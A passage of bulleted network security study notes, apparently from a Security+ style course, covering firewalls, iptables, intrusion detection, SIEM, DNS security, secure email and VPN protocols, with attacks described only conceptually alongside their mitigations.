○ Session Affinity: A scheduling approach used by load balancers to route
traffic to devices that have already established connections with the client
in question.
○ Session Persistence: the configuration option that enables a client to
maintain a connection with a load-balanced server over the duration of the
session.

Clustering
● A load balancing technique where a group of servers are configured as a unit
and work together to provide network services.
● If one of the nodes in the cluster stops working, connections can failover to a
working node.
● Virtual IP:
○ Unlike load balancing with a single appliance, the public IP used to access
the service is shared between the two instances in the cluster.
○ This is referred to as a virtual IP or shared or floating address.
○ The instances are configured with a private connection, on which each is
identified by its "real" IP address.
● Active/Passive (A/P) and Active/Active (A/A) Clustering:
○ The major advantage of active/passive configurations is that performance
is not adversely affected during failover.
○ An active/active cluster means that both nodes are processing
connections concurrently.
■ In the event of a failover the workload of the failed node is
immediately and transparently shifted onto the remaining node.
● Application Clustering:
○ Application clustering allows servers in the cluster to communicate
session information to one another.
 ○ For example, if a user logs in on one instance, the next session can start
on another instance, and the new server can access the cookies or other
information used to establish the login.

Quality of Service (QOS)

● Quality of Service (QoS) is a framework for prioritizing traffic based on its
characteristics.
○ It is primarily used to support voice and video applications that require a
minimum level of bandwidth and are sensitive to latency and jitter.
● Latency is the time it takes for a transmission to reach the recipient, measured in
milliseconds (ms).
● Jitter is defined as being a variation in the delay, or an inconsistent rate of
packet delivery.

Lesson 10: Implementing Network Security Appliances

Packet Filtering Firewalls

● Packet filtering describes the earliest type of network firewall. All firewalls can still
perform this basic function.
● Access Control Lists (ACLs):
○ A packet filtering firewall is configured by specifying a group of rules,
called an access control list (ACL).
○ Each rule defines a specific type of data packet and the action to take
when a packet matches the rule.
○ A packet filtering firewall can inspect the headers of IP packets.
○ This means that rules can be based on the information found in those
headers:
■ IP filtering—accepting or denying traffic on the basis of its source
and/or destination IP address. Some firewalls might also be able to
filter by MAC addresses.
■ Protocol ID/type (TCP, UDP, ICMP, routing protocols, and so on).
 ■ Port filtering/security—accepting or denying a packet on the basis
of source and destination port numbers (TCP or UDP application
type).
● Stateless Operation:
○ A type of firewall that does not preserve information about the connection
between two hosts.
○ This type of filtering requires the least processing effort, but it can be
vulnerable to attacks that are spread over a sequence of packets.
■ A stateless firewall can also introduce problems in traffic flow,
especially when some sort of load balancing is being used or when
clients or servers need to use dynamically assigned ports.

Stateful Inspection Firewalls

● A stateful inspection firewall addresses problems by tracking information about
the session established between two hosts, or blocking malicious attempts to
start a bogus session.
● The vast majority of firewalls now incorporate some level of stateful inspection
capability.
● Session data is stored in a state table.
● When a packet arrives, the firewall checks it to confirm whether it belongs to an
existing connection.
○ If it does not, it applies the ordinary packet filtering rules to determine
whether to allow it. Once the connection has been allowed, the firewall
usually allows traffic to pass unmonitored, in order to conserve processing
effort.
● Transport Layer (OSI Layer 4):
○ At the transport layer, the firewall examines the TCP three-way handshake
to distinguish new from established connections.
○ A legitimate TCP connection should follow a SYN > SYN/ACK > ACK
sequence to establish a session, which is then tracked using sequence
numbers.
 ○ Deviations from this, such as SYN without ACK or sequence number
anomalies, can be dropped as malicious flooding or session hijacking
attempts.
● Application Layer (OSI Layer 7):
○ An application-aware firewall can inspect the contents of packets at the
application layer.
○ One key feature is to verify the application protocol matches the port.
■ For example, a web application firewall could analyze the HTTP
headers and the HTML code present in HTTP packets to try to
identify code that matches a pattern in its threat database.
○ Also, the firewall cannot examine encrypted data packets, unless
configured with an SSL/TLS inspector.

IPTables
● iptables is a command line utility provided by many Linux distributions that
allows administrators to edit the rules enforced by the Linux kernel firewall
● iptables works with chains, which apply to the different types of traffic, such as
the INPUT chain for traffic destined for the local host.
● Each chain has a default policy set to DROP or ACCEPT traffic that does not
match a rule.
● The command iptables --list INPUT --line-numbers -n will show
the contents of the INPUT chain with line numbers and no name resolution.
● The rules in the following example drop any traffic from the specific host at
10.1.0.192 and allow ICMP echo requests (pings), DNS, and HTTP/HTTPS traffic
either from the local subnet (10.1.0.0/24) or from any network (0.0.0.0/0):
 ○
● The destination 0.0.0.0/0 means "anywhere."

Firewall Implementation
● You should consider how the firewall is implemented—as hardware or software,
for instance—to cover a given placement or use on the network.
● Firewall Appliances:
○ An appliance firewall is a stand-alone hardware firewall deployed to
monitor traffic passing into and out of a network zone.
○ A firewall appliance can be deployed in two ways:
■ Routed (layer 3)—the firewall performs forwarding between
subnets.
● Each interface on the firewall connects to a different subnet
and represents a different security zone.
■ Bridged (layer 2)—the firewall inspects traffic passing between two
nodes, such as a router and a switch.
● A router firewall or firewall router appliance implements filtering functionality as
part of the router firmware.
● Application-Based Firewalls:
○ Firewalls can also run as software on any type of computing host.
○ Host-based firewall (or personal firewall)—implemented as a software
application running on a single host designed to protect that host only.
 ■ A personal firewall can be used to allow or deny software
processes from accessing the network.
○ Application firewall—software designed to run on a server to protect a
particular application only (a web server firewall, for instance, or a firewall
designed to protect an SQL Server database).
○ Network operating system (NOS) firewall—a software-based firewall
running under a network server OS, such as Windows or Linux.
■ The server would function as a gateway or proxy for a network
segment.

Proxies and Gateways

● A firewall that performs application layer filtering is likely to be implemented as a
proxy.
● The proxy deconstructs each packet, performs analysis, then rebuilds the packet
and forwards it on, providing it conforms to the rules.
● Forward Proxy Servers:
○ A forward proxy provides for protocol-specific outbound traffic.
○ For example, you might deploy a web proxy that enables client computers
on the LAN to connect to websites and secure websites on the Internet.
● In addition, most web proxy servers provide caching engines, whereby
frequently requested web pages are retained on the proxy, negating the need to
re-fetch those pages for subsequent requests.
● Proxy servers can generally be classed as non-transparent or transparent:
○ A non-transparent proxy means that the client must be configured with
the proxy server address and port number to use it.
○ A transparent (or forced or intercepting) proxy intercepts client traffic
without the client having to be reconfigured.
■ A transparent proxy must be implemented on a switch or router or
other inline network appliance.
● Reverse Proxy Servers:
○ A reverse proxy server provides for protocol-specific inbound traffic.
 ○ For security purposes, you might not want external hosts to be able to
connect directly to application servers, such as web, email, and VoIP
servers.

Access Control Lists

● Firewall access control lists (ACLs) are configured on the principle of least
access.
● Each rule can specify whether to block or allow traffic based on several
parameters, often referred to as tuple.
○ For example, in the previous screenshot, the firewall imposes a 7-tuple
rule, which matches against Protocol, Source (address), (Source) Port,
Destination (address), (Destination) Port, Gateway, and Schedule.

Network Address Translation

● A routing mechanism that conceals internal addressing schemes from the public
Internet by translating between a single public address on the external side of a
router and private, non-routable addresses internally.
● Static and dynamic source NAT—perform 1:1 mappings between private ("inside
local") network address and public ("inside global") addresses.
● Overloaded NAT/Network Address Port Translation (NAPT)/Port Address
Translation (PAT)—provides a means for multiple private IP addresses to be
mapped onto a single public address.
○ For example, say two hosts (10.0.0.101 and 10.0.0.103) initiate a web
connection at the same time.
■ The NAPT service creates two new port mappings for these
requests (10.0.0.101:60101 and 10.0.0.103:60103). It then
substitutes the private IPs for the public IP and forwards the
requests to the public Internet.
● Destination NAT/port forwarding—uses the router's public address to publish a
web service, but forwards incoming requests to a different IP.
 ○ Port forwarding means that the router takes requests from the Internet for
a particular application (say, HTTP/port 80) and sends them to a
designated host and port in the DMZ or LAN.

Virtual Firewalls
● Virtual firewalls are usually deployed within data centers and cloud services.
● Hypervisor-based—this means that filtering functionality is built into the
hypervisor or cloud provisioning tool.
○ You can use the cloud's web app or application programming interface
(API) to write access control lists (ACLs) for traffic arriving or leaving a
virtual host or virtual network.
● Virtual appliance—this refers to deploying a vendor firewall appliance instance
using virtualization, in the same way you might deploy a Windows or Linux guest
OS.
● Multiple context—this refers to multiple virtual firewall instances running on a
hardware firewall appliance.

Open-Source Versus Proprietary Firewalls

● The code underpinning appliance-based, software, and virtual firewalls can be
developed as open-source or proprietary or somewhere in between:
○ Wholly proprietary—implemented as a proprietary OS, such as Cisco
ASA, Juniper JunOS, PaloAlto PAN-OS, or Barracuda's Windows-based
appliance.
○ Mostly proprietary—developed from a Linux kernel, but with proprietary
features added.
○ Wholly open-source—these can be used independently of the vendor, but
the vendors typically have commercial appliances and support contracts
too.

Network-Based Intrusion Detection Systems

 ● An intrusion detection system (IDS) is a means of using software tools to
provide real-time analysis of either network traffic or system and application logs.
● A network-based IDS (NIDS) captures traffic via a packet sniffer, referred to as
a sensor.
○ It analyzes the packets to identify malicious traffic and displays alerts to a
console or dashboard.
● A NIDS, such as Snort (snort.org), Suricata (https://suricata.io/), or Zeek/Bro
(zeek.org) performs passive detection.
○ When traffic is matched to a detection signature, it raises an alert or
generates a log entry, but does not block the source host.
○ This type of passive sensor does not slow down traffic and is undetectable
by the attacker.
● A NIDS is used to identify and log hosts and applications and to detect attack
signatures, password guessing attempts, port scans, worms, backdoor
applications, malformed packets or sessions, and policy violations.

Taps and Port Mirrors

● Typically, the packet capture sensor is placed inside a firewall or close to a
server of particular importance.
○ The idea is usually to identify malicious traffic that has managed to get
past the firewall.
● There are three main options for connecting a sensor to the appropriate point in
the network:
○ SPAN (switched port analyzer)/mirror port—this means that the sensor
is attached to a specially configured port on the switch that receives
copies of frames addressed to nominated access ports (or all the other
ports).
○ Passive test access point (TAP)—this is a box with ports for incoming
and outgoing network cabling and an inductor or optical splitter that
physically copies the signal from the cabling to a monitor port.
■ A hardware device inserted into a cable to copy frames for analysis.
 ○ Active TAP—this is a powered device that performs signal regeneration
(again, there are copper and fiber variants), which may be necessary in
some circumstances.

Network-Based Intrusion Prevention Systems

● A network security tool that can actively block attacks.
○ One typical preventive measure is to end the TCP session, sending a TCP
reset packet to the attacking host.
○ Another option is for the IPS to apply a temporary filter on the firewall to
block the attacker's IP address (shunning).
● IPS appliances are positioned like firewalls at the border between two network
zones.

Signature-Based Detection
● Signature-based detection (or pattern-matching) means that the engine is
loaded with a database of attack patterns or signatures.
● If traffic matches a pattern, then the engine generates an incident.
● The signatures and rules (often called plug-ins or feeds) powering intrusion
detection need to be updated regularly to provide protection against the latest
threat types.

Behavior and Anomaly-Based Detection

● Behavioral-based detection means that the engine is trained to recognize
baseline "normal" traffic or events
○ Anything that deviates from this baseline (outside a defined level of
tolerance) generates an incident.
○ The idea is that the software will be able to identify zero day attacks,
insider threats, and other malicious activity for which there is no signature.
● Heuristics:
 ○ A method that uses feature comparisons and likenesses rather than
specific signature matching to identify whether the target of observation is
malicious.

Next-Generation Firewalls and Content Filters

● Next-Generation Firewall (NGFW): Host or network firewall capable of parsing
application layer protocol headers and data (such as HTTP or SMTP) so that
sophisticated, content-sensitive ACLs can be developed.
● Unified Threat Management (UTM):
○ refers to a security product that centralizes many types of security controls
—firewall, anti-malware, network intrusion prevention, spam filtering,
content filtering, data loss prevention, VPN, cloud access gateway—into a
single appliance.
○ This means that you can monitor and manage the controls from a single
console.
● Content/URL Filter:
○ A content filter is designed to apply a number of user-focused filtering
rules, such as blocking uniform resource locators (URLs) that appear on
content block lists or applying time-based restrictions to browsing.
■ Content filters are now usually implemented as a class of product
called a secure web gateway (SWG).

Host-Based Intrusion Detection Systems

● A host-based IDS (HIDS) captures information from a single host, such as a
server, router, or firewall.
● The core ability is to capture and analyze log files, but more sophisticated
systems can also monitor OS kernel files, monitor ports and network interfaces,
and process data and logs generated by specific applications, such as HTTP or
FTP.
● One of the core features of HIDS is file integrity monitoring (FIM).
 ○ A type of software that reviews system files to ensure that they have not
been tampered with.

Web Application Firewalls

● A web application firewall (WAF) is designed specifically to protect software
running on web servers and their back-end databases from code injection and
DoS attacks.
● The WAF can be programmed with signatures of known attacks and use pattern
matching to block requests containing suspect code.
● A WAF may be deployed as an appliance or as plug-in software for a web server
platform.
● Some examples of WAF products include:
○ ModSecurity (modsecurity.org) is an open source (sponsored by
Trustwave) WAF for Apache, nginx, and IIS.
○ NAXSI (github.com/nbs-system/naxsi) is an open source module for the
nginx web server software.
○ Imperva (imperva.com) is a commercial web security offering with a
particular focus on data centers.

Monitoring Services
● Network Monitor:
○ collects data about network appliances, such as switches, access points,
routers, firewalls, and servers.
○ This is used to monitor load status for CPU/memory, state tables, disk
capacity, fan speeds/temperature, network link utilization/error statistics,
and so on.
○ This data might be collected using the Simple Network Management
Protocol (SNMP) or a proprietary management system.
● Logs:
○ A security log can record both authorized and unauthorized uses of a
resource or privilege.
Security Information and Event Management
● A solution that provides real-time or near-real-time analysis of security alerts
generated by network hardware and applications.
● Log Collection:
○ The first task for SIEM is to collect data inputs from multiple sources.
● There are three main types of log collection:
○ Agent-based—with this approach, you must install an agent service on
each host.
○ Listener/collector—rather than installing an agent, hosts can be
configured to push updates to the SIEM server using a protocol such as
syslog or SNMP.
○ Sensor—as well as log data, the SIEM might collect packet captures and
traffic flow data from sniffers.
● Log Aggregation:
○ refers to normalizing data from different sources so that it is consistent
and searchable.

Analysis and Report Review

● A critical function of SIEM—and the principal factor distinguishing it from basic
log management—is that of correlation.
● User and Entity Behavior Analytics (UEBA):
○ solution supports identification of malicious behaviors from comparison to
a baseline.
○ The analytics software tracks user account behavior across different
devices and cloud services.
○ Entity refers to machine accounts, such as client workstations or
virtualized server instances, and to embedded hardware, such as Internet
of Things (IoT) devices.
● Sentiment Analysis:
○ One of the biggest challenges for behavior analytics driven by machine
learning is to identify intent.
 ○ Sentiment Anlaysis: Devising an AI/ML algorithm that can describe or
classify the intention expressed in natural language statements.
■ The typical use case for sentiment analysis is to monitor social
media for brand "incidents," such as a disgruntled customer
announcing on Twitter what poor customer service they have just
received.
● Security Orchestration, Automation, and Response:
○ Security orchestration, automation, and response (SOAR) is designed as
a solution to the problem of the volume of alerts overwhelming analysts'
ability to respond.
○ The basis of SOAR is to scan the organization's store of security and
threat intelligence, analyze it using machine/deep learning techniques,
and then use that data to automate and provide data enrichment for the
workflows that drive incident response and threat hunting.

File Manipulation
● While SIEM can automate many functions of log collection and review, you may
also have to manually prepare data using a Linux command line.
● The Cat Command:
○ The Linux cat command allows you to view the contents of one or more
files.
○ For example, if you want to view the whole contents of two rotated log
files, you could run: cat -n access.log access2.log
○ The -n switch adds line numbers
● The head and tail Commands:
○ The head and tail commands output the first and last 10 lines
respectively of a file you provide.
● The Logger Command:
○ The logger command writes input to the local system log or to a remote
syslog server.
Regular Expressions and GREP
● Regular Expressions (regex): A group of characters that describe how to execute
a specific search pattern on a given text.
● The following list illustrates some commonly used elements of regex syntax:
○ [ … ] matches a single instance of a character within the brackets. This
can include literals, ranges such as [a-z], and token matches, such as [\s]
(white space) or [\d] (one digit).
○ + matches one or more occurrences. A quantifier is placed after the term
to match; for example, \s+ matches one or more white space characters.
○ * matches zero or more times.
○ ? matches once or not at all.
○ {} matches a number of times. For example, {2} matches two times, {2,}
matches two or more times, and {2,5} matches two to five times.
● Grep Command: The grep command invokes simple string matching or regex
syntax to search text files for specific strings.
○ This enables you to search the entire contents of a text file for a specific
pattern within each line and display that pattern on the screen or dump it
to another file.

Lesson 11: Implementing Secure Network Protocols

Network Address Location

● Interface addresses for routers, firewalls, and some types of servers are best
assigned and managed manually.
● DHCP:
○ The key point about DHCP is that only one server should be offering
addresses to any one group of hosts.
○ If a rogue DHCP server is set up, it can perform DoS (as client machines
will obtain an incorrect TCP/IP configuration) or be used to snoop network
information.
 ○ DHCP starvation is a type of DoS attack where a rogue client repeatedly
requests new IP addresses using spoofed MAC addresses, with the aim of
exhausting the IP address pool.
● Enabling the DHCP snooping port security feature on a switch can mitigate rogue
DHCP attacks.
○ Windows DHCP servers in an AD environment automatically log any traffic
detected from unauthorized DHCP servers.

Domain Name Resolution

● It uses a distributed database system that contains information on domains and
hosts within those domains.
● The information is distributed among many name servers, each of which holds
part of the database.
● Domain Hijacking:
○ Domain hijacking is an attack where an adversary acquires a domain for
a company's trading name or trademark, or perhaps some spelling
variation thereof.
○ In a domain hijacking attack an adversary gains control over the
registration of a domain name, allowing the host records to be configured
to IP addresses of the attacker's choosing.
○ The whois command can be used to lookup domain registration
information to try to detect misuse in other cases.
● Uniform Resource Locator (URL) Redirection:
○ A URL comprises a FQDN, file path, and often script parameters.
○ URL redirection refers to the use of HTTP redirecting to open a page other
than the one the user requested.
● Domain Reputation:
○ If your domain, website, or email servers have been hijacked, they are
likely to be used for spam or distributing malware.
○ You should set up monitoring using a site such as
talosintelligence.com/reputation_center to detect misuse early.
DNS Poisoning
● DNS poisoning is an attack that compromises the process by which clients
query name servers to locate the IP address for a Fully Qualified Domain Name
(FQDN).
● Man in the Middle:
○ If the threat actor has access to the same local network as the victim, the
attacker can use Address Resolution Protocol (ARP) poisoning to
impersonate a legitimate DNS server and respond to DNS queries from
the victim with spoofed replies.
● DNS Client Cache Poisoning:
○ Before DNS was developed in the 1980s, name resolution took place
using a text file named HOSTS.
○ Therefore, if an attacker is able to place a false <name>:<IP address>
mapping in the HOSTS file and effectively poison the DNS cache, he or
she will be able to redirect traffic.
● DNS Server Cache Poisoning:
○ DNS server cache poisoning aims to corrupt the records held by the DNS
server itself.
○ This can be accomplished by performing DoS against the server that
holds the authorized records for the domain, and then spoofing replies to
requests from other name servers.

DNS Security
● To ensure DNS security on a private network, local DNS servers should only
accept recursive queries from local hosts (preferably authenticated local hosts)
and not from the Internet.
● You also need to implement access control measures on the server, to prevent a
malicious user from altering records manually.
● DNS Security Extensions (DNSSEC):
○ Help to mitigate against spoofing and poisoning attacks by providing a
validation process for DNS responses.
 ○ With DNSSEC enabled, the authoritative server for the zone creates a
"package" of resource records (called an RRset) signed with a private key
(the Zone Signing Key).

Secure Directory Services

● A network directory lists the subjects (principally users, computers, and services)
and objects (such as directories and files) available on the network plus the
permissions that subjects have over objects.
● Most directory services are based on the Lightweight Directory Access
Protocol (LDAP), running over port 389.
● Authentication (referred to as binding to the server) can be implemented in the
following ways:
○ No authentication—anonymous access is granted to the directory.
○ Simple bind—the client must supply its distinguished name (DN) and
password, but these are passed as plaintext.
○ Simple Authentication and Security Layer (SASL)—the client and server
negotiate the use of a supported authentication mechanism, such as
Kerberos.
○ LDAP Secure (LDAPS)—the server is installed with a digital certificate,
which it uses to set up a secure tunnel for the user credential exchange.
LDAPS uses port 636.

Time Synchronization
● The Network Time Protocol (NTP) provides a transport over which to synchronize
these time dependent applications. NTP works over UDP on port 123.
● Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC)
from a highly accurate clock source, such as an atomic clock.
● Lower tier servers then obtain the UTC from multiple stratum 1 servers and
sample the results to obtain an authoritative time.
● NTP has historically lacked any sort of security mechanism, but there are moves
to create a security extension for the protocol called Network Time Security.
Simple Network Management Protocol Security
● The Simple Network Management Protocol (SNMP) is a widely used
framework for management and monitoring. SNMP consists of an SNMP monitor
and agents.
● The agent is a process (software or firmware) running on a switch, router, server,
or other SNMP-compatible network device.
● This agent maintains a database called a management information base (MIB)
that holds statistics relating to the activity of the device (for example, the number
of frames per second handled by a switch).
○ The agent is also capable of initiating a trap operation where it informs the
management system of a notable event (port failure, for instance).
● The SNMP monitor (a software program) provides a location from which network
activity can be overseen.
○ It monitors all agents by polling them at regular intervals for information
from their MIBs and displays the information for review.

Hypertext Transfer Protocol and Web Services

● HTTP enables clients (typically web browsers) to request resources from an
HTTP server.
● A client connects to the HTTP server using an appropriate TCP port (the default
is port 80) and submits a request for a resource, using a uniform resource locator
(URL).
● The server acknowledges the request and responds with the data (or an error
message).
● The response and request payload formats are defined in an HTTP header.

Transport Layer Security

● A security protocol that uses certificates for authentication and encryption to
protect web communication.
● SSL proved very popular with the industry, and it was quickly adopted as a
standard named Transport Layer Security (TLS).
 ● To implement TLS, a server is assigned a digital certificate signed by some
trusted certificate authority (CA).
○ The certificate proves the identity of the server (assuming that the client
trusts the CA) and validates the server's public/private key pair.
○ The server uses its key pair and the TLS protocol to agree upon mutually
supported ciphers with the client and negotiate an encrypted
communications session.
● SSL/TLS Versions:
○ While the acronym SSL is still used, the Transport Layer Security versions
are the only ones that are safe to use.
○ One of the main features of TLS 1.3 is the removal of the ability to perform
downgrade attacks by preventing the use of unsecure features and
algorithms from previous versions.
● Cipher Suites:
○ A cipher suite is the group of algorithms supported by both the client and
server to perform the different encryption and hashing operations required
by the protocol.

API Considerations
● HTTP is now used less to serve static web pages, and more to create web
applications, often as part of a cloud product.
● The primary means of configuring and managing a web application is via its
application programming interface (API).
● The developer uses the POST method to submit data to the URL with the
required parameters coded into the request body, often in JavaScript Object
Notation (JSON).
● Use of these APIs is authorized via a token or secret key.

Subscription Services
● Employees may require access to all kinds of subscription services. Some
examples include:
 ○ Market and financial intelligence and information.
○ Security threat intelligence and information.
○ Reference and training materials in various formats (ebook and video, for
instance).
○ Software applications and cloud services paid for by subscription rather
than permanent licenses.
● XML Injection:
○ Attack method where malicious XML is passed as input to exploit a
vulnerability in the target app.

File Transfer Services

● A protocol used to transfer files between network hosts. Variants include
S(ecure)FTP, FTP with SSL (FTPS and FTPES) and T(rivial)FTP. FTP utilizes
ports 20 and 21.
● SSH FTP (SFTP) and FTP Over SSL (FTPS):
○ SSH FTP (SFTP) addresses the privacy and integrity issues of FTP by
encrypting the authentication and data transfer between client and server.
○ Another means of securing FTP is to use the connection security protocol
SSL/TLS. There are two means of doing this:
■ Explicit TLS (FTPES)—use the AUTH TLS command to upgrade an
unsecure connection established over port 21 to a secure one.
■ Implicit TLS (FTPS)—negotiate an SSL/TLS tunnel before the
exchange of any FTP commands. This mode uses the secure port
990 for the control connection.

Email Services

● The Simple Mail Transfer Protocol (SMTP) transmits email messages from one
system to another.
● The Post Office Protocol v3 (POP3) receives email messages from an email
server to store on a client computer.
● Secure SMTP (SMTPS):
 ○ A sender’s SMTP server discovers the IP address of the recipient’s SMTP
server using the domain name of the recipient’s email address.
● There are two ways for SMTP to use TLS:
○ STARTTLS—this is a command that upgrades an existing unsecure
connection to use TLS. This is also referred to as explicit TLS or
opportunistic TLS.
○ SMTPS—this establishes the secure connection before any SMTP
commands (HELO, for instance) are exchanged. This is also referred to as
implicit TLS.
● Secure POP (POP3S):
○ When a recipient’s email client connects to a server mailbox, POP3
downloads the email messages.
○ A POP3 client application, such as Microsoft Outlook or Mozilla
Thunderbird, establishes a TCP connection to the POP3 server over port
110.
● Secure IMAP (IMAPS):
○ Compared to POP3, the Internet Message Access Protocol v4 (IMAP4)
supports permanent connections to a server and connecting multiple
clients to the same mailbox simultaneously.
○ It also allows a client to manage mail folders on the server. Clients
connect to IMAP over TCP port 143.

Secure/Multipurpose Internet Mail Extensions

● Secure/Multipurpose Internet Mail Extensions: An email encryption standard that
adds digital signatures and public key cryptography to traditional MIME
communications.
● To use S/MIME, the user is issued a digital certificate containing his or her public
key, signed by a CA to establish its validity
● The public key is paired with a private key that is kept secret by the user.
● To establish the exchange of secure emails, both users must be using S/MIME
and exchange certificates:
 ○ Alice sends Bob her digital certificate, containing her public key and
validated digital ID (an email address). She signs this message using her
private key.
○ Bob uses the public key in the certificate to decode her signature and the
signature of the CA (or chain of CAs) validating her digital certificate and
digital ID and decides that he can trust Alice and her email address.
○ He responds with his digital certificate and public key and Alice, following
the same process, decides to trust Bob.
○ Both Alice and Bob now have one another's certificates in their trusted
certificate stores.
○ When Alice wants to send Bob a confidential message, she makes a hash
of the message and signs the hash using her private key. She then
encrypts the message, hash, and her public key using Bob's public key
and sends a message to Bob with this data as an S/MIME attachment.
○ Bob receives the message and decrypts the attachment using his private
key. He validates the signature and the integrity of the message by
decrypting it with Alice's public key and comparing her hash value with
one he makes himself.

Voice and Video Services

● Voice over IP (VoIP), web conferencing, and video teleconferencing (VTC)
solutions have become standard methods for the provision of business
communications.
● Implementing Internet telephony and video conferencing brings its own raft of
security concerns.
● The protocols designed to support real-time services cover one or more of the
following functions:
○ Session control—used to set up and manage communications sessions.
They handle tasks such as user discovery (locating a user on the
network), availability advertising (whether a user is prepared to receive
 calls), negotiating session parameters (such as use of audio/video), and
session management and termination.
○ Data transport—handles the delivery of the actual video or voice
information.
○ Quality of Service (QoS)—provides information about the connection to a
QoS system, which in turn ensures that voice or video communications
are free from problems such as dropped packets, delay, or jitter.
● The Session Initiation Protocol (SIP) is one of the most widely used session
control protocols.
○ SIP endpoints are the end-user devices (also known as user-agents),
such as IP-enabled handsets or client and server web conference
software.
○ SIP endpoints can establish communications directly in a peer-to-peer
architecture, but it is more typical to use intermediary servers and
directory servers.
○ While SIP provides session management features, the actual delivery of
real-time data uses different protocols.
■ The principal one is Real-time Transport Protocol (RTP).
● Connection security for voice and video works in a similar manner to HTTPS. To
initiate the call, the secure version SIPS uses digital certificates to authenticate
the endpoints and establish a TLS tunnel.
○ The secure connection established by SIPS can also be used to generate
a master key to use with the secure versions of the transport protocol
(SRTP).

Remote Access Architecture

● These days, most remote access is implemented as a virtual private network
(VPN), running over the Internet.
● With a remote access VPN, clients connect to a VPN gateway on the edge of the
private network.
 ○ This is the "telecommuter" model, allowing home-workers and employees
working in the field to connect to the corporate network.

○
● A VPN can also be deployed in a site-to-site model to connect two or more
private networks.
○ Where remote access VPN connections are typically initiated by the client,
a site-to-site VPN is configured to operate automatically.
○ The gateways exchange security information using whichever protocol the
VPN is based on.
○ This establishes a trust relationship between the gateways and sets up a
secure connection through which to tunnel data.
 ○

Transport Layer Security VPN

● Legacy protocols such as the Point-to-Point Tunneling Protocol (PPTP) have
been deprecated because they do not offer adequate security.
● A TLS VPN (still more commonly referred to as an SSL VPN) requires a remote
access server listening on port 443 (or any arbitrary port number).
○ The client makes a connection to the server using TLS so that the server
is authenticated to the client (and optionally the client's certificate must be
authenticated by the server).
○ This creates an encrypted tunnel for the user to submit authentication
credentials, which would normally be processed by a RADIUS server.
● OpenVPN is an open source example of a TLS VPN (openvpn.net).
○ OpenVPN can work in TAP (bridged) mode to tunnel layer 2 frames or in
TUN (routed) mode to forward IP packets.
● Another option is Microsoft's Secure Socket Tunneling Protocol (SSTP), which
works by tunneling Point-to-Point Protocol (PPP) layer 2 frames over a TLS
session.
● The Point-to-Point Protocol (PPP) is a widely used remote dial-in protocol.
Internet Protocol Security
● Internet Protocol Security (IPSec) operates at the network layer (layer 3) of the
OSI model, so it can be implemented without having to configure specific
application support.
● IPSec can provide both confidentiality (by encrypting data packets) and
integrity/anti-replay (by signing each packet).
● The main drawback is that it adds overhead to data communications.
● Authentication Header (AH):
○ The Authentication Header (AH) protocol performs a cryptographic hash
on the whole packet, including the IP header, plus a shared secret key
(known only to the communicating hosts), and adds this HMAC in its
header as an Integrity Check Value (ICV).
○ The payload is not encrypted so this protocol does not provide
confidentiality.
○ Also, the inclusion of IP header fields in the ICV means that the check will
fail across NAT gateways, where the IP address is rewritten.
○ Consequently, AH is not often used.
● Encapsulation Security Payload (ESP):
○ Encapsulation Security Payload (ESP) provides confidentiality and/or
authentication and integrity.
○ It can be used to encrypt the packet rather than simply calculating an
HMAC.

IPSec Transport and Tunnel Modes

● IPSec can be used in two modes:
○ Transport mode—this mode is used to secure communications between
hosts on a private network (an end-to-end implementation).
■ When ESP is applied in transport mode, the IP header for each
packet is not encrypted, just the payload data.
○ Tunnel mode—this mode is used for communications between VPN
gateways across an unsecure network (creating a VPN).
 ■ With ESP, the whole IP packet (header and payload) is encrypted
and encapsulated as a datagram with a new IP header.

Internet Key Exchange

● IPSec's encryption and hashing functions depend on a shared secret.
● The Internet Key Exchange (IKE) protocol handles authentication and key
exchange, referred to as Security Associations (SA).
● IKE negotiations take place over two phases:
○ Phase I establishes the identity of the two hosts and performs key
agreement using the Diffie-Hellman algorithm to create a secure channel.
Two methods of authenticating hosts are commonly used:
■ Digital certificates—the hosts use certificates issued by a mutually
trusted certificate authority to identify one another.
■ Pre-shared key (group authentication)—the same passphrase is
configured on both hosts.
○ Phase II uses the secure channel created in Phase I to establish which
ciphers and key sizes will be used with AH and/or ESP in the IPSec
session.

Layer 2 Tunneling Protocol and IKE v2

● Consequently, for remote access VPNs, a combination of IPSec with the Layer 2
Tunneling Protocol (L2TP) VPN protocol is often used.
● For a secure L2TP/IPSec VPN configuration, specific ports need to be allowed
through the firewall.
○ The L2TP protocol typically uses UDP port 1701.
○ For IPSec, UDP port 500 is essential for IKE negotiations, and UDP port
4500 is used for NAT traversal.
● Layer 2 Tunneling Protocol/IPSec VPN:
○ A L2TP/IPSec VPN would typically operate as follows:
■ The client and VPN gateway set up a secure IPSec channel over
the Internet, using either a pre-shared key or certificates for IKE.
 ■ The VPN gateway uses L2TP to set up a tunnel to exchange local
network data encapsulated as Point-to-Point Protocol (PPP)
frames.
■ The user authenticates over the PPP session using EAP or CHAP.
● IKE v2:
○ IKEv2 has some additional features that have made the protocol popular
for use as a standalone remote access VPN solution.
○ The main changes are:
■ Support for EAP authentication methods, allowing, for example,
user authentication against a RADIUS server.
■ Simplified connection setup—IKEv2 specifies a single 4-message
setup mode, reducing bandwidth without compromising security.
■ Reliability — IKEv2 supports NAT traversal and the feature of
multihoming through MOBIKE (IKEv2 Mobility and Multihoming
Protocol).
■ Compared to L2TP/IPSec, using IKE v2 is more efficient. This
solution is becoming much better supported, with native support in
Windows 10, for instance.

VPN Client Configuration

● Always-On VPN:
○ An always-on VPN means that the computer establishes the VPN
whenever an Internet connection over a trusted network is detected, using
the user's cached credentials to authenticate.
● Split Tunnel versus Full Tunnel:
○ Split Tunnel: VPN configuration where only traffic for the private network is
routed via the VPN gateway.
 ■

○ Full Tunnel: Internet access is mediated by the corporate network, which

will alter the client's IP address and DNS servers and may use a proxy.
■

Remote Desktop
 ● Microsoft's Remote Desktop Protocol (RDP) can be used to access a physical
machine on a one-to-one basis.
● HTML5 VPN: Using features of HTML5 to implement remote desktop/VPN
connections via browser software (clientless).

Out-Of-Band Management and Jump Servers

● Remote access management refers to the specific use case of using a secure
channel to administer a network appliance or server.
● The secure admin workstations (SAWs) used to perform management functions
must be tightly locked down, ideally installed with no software other than that
required to access the administrative channel—minimal web browser, remote
desktop client, or SSH virtual terminal, for instance.
● Out-of-Band Management:
○ Remote management methods can be described as either in-band or out-
of-band (OOB).
○ An in-band management link is one that shares traffic with other
communications on the "production" network.
○ A serial console or modem port on a router is a physically out-of-band
management method.
■ When using a browser-based management interface or a virtual
terminal over Ethernet and IP, the link can be made out-of-band by
connecting the port used for management access to physically
